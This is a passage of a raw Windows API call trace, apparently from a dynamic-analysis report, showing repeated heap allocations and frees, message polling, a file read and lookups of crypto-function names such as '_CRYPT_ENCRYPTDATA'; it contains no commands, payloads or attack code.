hHeap=0x8a0000) returned 1 [0197.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.204] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0197.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0197.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0197.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0197.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0197.204] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0197.204] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0197.204] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0197.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0197.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0197.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0197.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0197.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0197.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0197.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0197.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0197.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0197.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0197.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0197.205] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0197.205] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xe1da, lpOverlapped=0x0) returned 1 [0197.208] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0197.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0197.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0197.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0197.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe1da) returned 0xbea018 [0197.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0197.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0197.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0197.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0197.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0197.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe1da) returned 0xbf8200 [0197.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0197.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.210] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0197.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0197.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0197.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0197.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe1da) returned 0xbea018 [0197.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0197.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0197.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0197.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0197.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.210] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0197.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0197.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0197.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0197.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0197.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0197.210] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0197.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0197.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0197.211] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0197.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27d8 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe1da) returned 0xbea018 [0197.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28a8 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0197.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0197.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0197.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0197.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe1da) returned 0xa5f008 [0197.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0197.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0197.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0197.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0197.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0197.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0197.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0197.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0197.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0197.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0197.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0197.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0197.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0197.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0197.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0197.213] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0197.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0197.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0197.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0197.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0197.214] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0197.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0197.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0197.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0197.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0197.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0197.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0197.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0197.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0197.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0197.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0197.215] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0197.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0197.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0197.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27b8 [0197.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0197.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0197.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0197.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0197.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0197.216] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0197.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0197.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0197.217] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0197.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0197.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0197.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0197.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0197.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0197.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0197.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0197.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0197.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0197.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0197.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0197.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.218] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0197.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0197.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0197.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0197.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0197.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0197.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0197.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0197.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0197.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0197.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0197.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0197.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0197.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0197.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0197.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0197.219] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0197.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0197.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0197.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0197.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0197.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0197.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0197.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0197.220] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.220] 